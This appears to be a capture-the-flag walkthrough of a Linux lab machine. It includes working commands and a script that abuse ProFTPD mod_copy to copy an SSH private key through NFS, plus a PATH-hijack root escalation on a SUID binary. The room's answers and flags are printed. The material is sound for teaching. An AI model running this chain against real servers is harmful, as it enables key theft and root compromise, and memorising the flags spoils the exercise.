In this room we practise enumerating and exploiting vulnerabilities on a Linux server.

Task 1 Deploy the vulnerable machine
Let’s use nmap and enumerate the attached virtual machine!
Scan the machine with nmap, how many ports are open? 7
Task 2 Enumerating Samba for shares
Samba can be further enumerated with nmap.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <VM_IP>
Using the nmap command above, how many shares have been found? 3
Then we can check the share.
smbclient //<VM_IP>/anonymous
Once you’re connected, list the files on the share. What is the file you can see? log.txt
We can also download the share’s contents recursively with smbget.
smbget -R smb://<VM_IP>/anonymous
Checking the log.txt file we will see the answer for the next question.
What port is FTP running on? 21
In the next task we run nmap again, this time against port 111 (rpcbind), using the NFS scripts to list what the server exports.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <VM_IP>
What mount can we see? /var
Task 3 Gain initial access with ProFtpd
Let’s connect to the FTP port with netcat and read the banner to learn the FTP server version!
nc <VM_IP> 21
What is the version? 1.3.5
Next we have to use searchsploit to find exploits to this ProFtpd version.
searchsploit proftpd 1.3.5
Important note: at the time of writing, running searchsploit on the AttackBox gave a different result! The expected answer can be reproduced on the Kali machine, or on any other machine with searchsploit installed.
How many exploits are there for the ProFTPd running? 4
The exploit we use abuses the mod_copy module of this ProFTPD version: its SITE CPFR and SITE CPTO commands copy a file on the server without any login. We use it to copy kenobi’s private SSH key into /var/tmp, which lies inside the /var NFS export we found earlier:
nc <VM_IP> 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<VM_IP>]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Then let’s mount the exported /var directory over NFS; the copied key is now under /var/tmp, so it becomes readable through the mount.
mkdir /mnt/kenobiNFS
mount <VM_IP>:/var /mnt/kenobiNFS
Now we can use the private SSH key of the kenobi user to SSH into the box.
cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@<VM_IP>
Once logged in, we can read the flag file.
What is Kenobi’s user flag (/home/kenobi/user.txt)? d0b0f3f53b6caa532a83915e19224899
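The whole initial-access chain above, scripted as an added example of my own (not the room’s code and not from the room’s author): it sends the mod_copy commands through nc instead of typing them, checks the reply codes before going further, and then mounts the export and fetches the key. It assumes the variable VM_IP is set by the caller, that nc is a netcat accepting -w, and that the mount functions run as root; the reply transcript embedded at the bottom is constructed to mirror the ProFTPD responses shown in the nc session above so the parsing can be exercised offline.

```sh
#!/bin/sh
# Added example, not code from the room: script the mod_copy file copy and
# the NFS retrieval of the key. Assumes VM_IP is set and nc supports -w.

# Command sequence for one copy via ProFTPD's mod_copy; no USER/PASS needed.
mod_copy_commands() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Pull the version out of the 220 banner (e.g. "1.3.5"); empty if not ProFTPD.
banner_version() {
    sed -n 's/^220 ProFTPD \([0-9.][0-9.]*\) .*/\1/p' | head -n 1
}

# Succeed only if the server accepted the source path (350) and the copy (250).
copy_succeeded() {
    reply=$(cat)
    printf '%s\n' "$reply" | grep -q '^350 ' && printf '%s\n' "$reply" | grep -q '^250 Copy successful'
}

# Live step 1: copy kenobi's key into /var/tmp, which sits inside the /var export.
copy_key_via_ftp() {
    mod_copy_commands /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa \
        | nc -w 5 "$VM_IP" 21 | tee ftp_reply.txt
    copy_succeeded < ftp_reply.txt
}

# Live step 2: mount the export and take a private copy of the key (needs root).
fetch_key_over_nfs() {
    mkdir -p /mnt/kenobiNFS
    mount "$VM_IP:/var" /mnt/kenobiNFS || return 1
    cp /mnt/kenobiNFS/tmp/id_rsa ./id_rsa && chmod 600 ./id_rsa
    umount /mnt/kenobiNFS
}

# Constructed transcript mirroring the replies seen in the nc session above.
sample_reply() {
    printf '220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.10]\r\n'
    printf '350 File or directory exists, ready for destination name\r\n'
    printf '250 Copy successful\r\n221 Goodbye.\r\n'
}

# Offline demonstration of the parsing; the live functions are for the lab VM only.
main() {
    echo "version: $(sample_reply | banner_version)"
    if sample_reply | copy_succeeded; then echo "copy ok"; else echo "copy failed"; fi
    # Live use: copy_key_via_ftp && fetch_key_over_nfs && ssh -i id_rsa "kenobi@$VM_IP"
}
main
```

The check on the 350 reply matters: if CPFR is rejected (the source path is wrong or unreadable) the following CPTO has nothing to copy, and the script should stop rather than mount the export looking for a file that never arrived.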
Task 4 Privilege Escalation with Path Variable Manipulation
First, run the command the room provides to list binaries with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
One of the binaries will catch our attention.
What file looks particularly out of the ordinary? /usr/bin/menu
Run the binary, how many options appear? 3
The room then suggests running strings on the binary to see what it calls. Let’s run it!
strings /usr/bin/menu
In the output we will see that the “status check” option runs curl -I localhost. The command uses the bare name curl rather than an absolute path, so the program is resolved through our PATH while the binary runs with root’s privileges.
Following the task we prepare our own curl that starts a shell, and put its directory first in PATH. The file contains only the string /bin/sh and has no shebang; when menu’s shell tries to execute it the kernel refuses, the shell falls back to reading it as a script, and that script launches /bin/sh.
echo /bin/sh > curl
chmod 777 curl
mv curl /tmp
cd /tmp/
export PATH=/tmp:$PATH
/usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# ls /root
root.txt
# cat /root/root.txt
177b3cd8562289f37382721c28381f02
After running /usr/bin/menu and choosing option 1, the SUID binary executes our fake curl instead of the real one, and we land in a shell running as root (uid=0).
We can now read the root user’s home directory and its files.
What is the root flag (/root/root.txt)? 177b3cd8562289f37382721c28381f02
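To make the mechanism concrete, here is an added example of my own (not the room’s code and not /usr/bin/menu itself) that reproduces the lookup flaw in a scratch directory and shows the fix: a stand-in status check that calls curl by bare name, the same check with an absolute path and a reset PATH, and a planted curl that only announces that it ran instead of spawning /bin/sh. It assumes a POSIX sh with mktemp; no real curl or SUID bit is needed for the demonstration.

```sh
#!/bin/sh
# Added example, not the room's code: the PATH lookup that /usr/bin/menu
# relies on, reproduced with a harmless fake curl, beside the hardened form.

# Stand-in for menu's option 1: "curl" is resolved through $PATH at run time,
# so whoever controls PATH controls which program runs here.
vulnerable_status_check() {
    curl -I localhost
}

# Hardened form: fixed PATH and absolute path, so the caller's PATH is irrelevant.
# (Only ever called from a subshell below, so the PATH reset does not leak out.)
hardened_status_check() {
    PATH=/usr/local/bin:/usr/bin:/bin
    /usr/bin/curl -I localhost
}

# Plant a fake curl in the directory given. The room's payload is "/bin/sh";
# this one only prints a marker so the demonstration is safe to run anywhere.
plant_fake_curl() {
    printf '#!/bin/sh\necho HIJACKED\n' > "$1/curl"
    chmod 755 "$1/curl"
}

# Which "curl" wins once the directory is prepended to PATH?
resolve_curl_with() {
    ( PATH="$1:$PATH"; command -v curl )
}

# First output line of the vulnerable check under a hijacked PATH.
vulnerable_under_hijack() {
    ( PATH="$1:$PATH"; vulnerable_status_check 2>/dev/null ) | head -n 1
}

# Same for the hardened check: the fake curl is never consulted.
hardened_under_hijack() {
    ( PATH="$1:$PATH"; hardened_status_check 2>/dev/null ) | head -n 1
}

main() {
    dir=$(mktemp -d)
    plant_fake_curl "$dir"
    echo "resolves to: $(resolve_curl_with "$dir")"
    echo "vulnerable:  $(vulnerable_under_hijack "$dir")"
    echo "hardened:    $(hardened_under_hijack "$dir")"
    rm -rf "$dir"
}
main
```

The hardened line shows nothing useful on a machine without a web server on localhost, which is the point: it either runs the real /usr/bin/curl or fails, but it never picks up the planted file. For a SUID program the same rule applies to every command it runs, and the safest fix is to avoid shelling out at all.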
This room is done.
If you have anything to share then please visit my Tom’s IT Cafe Discord Server!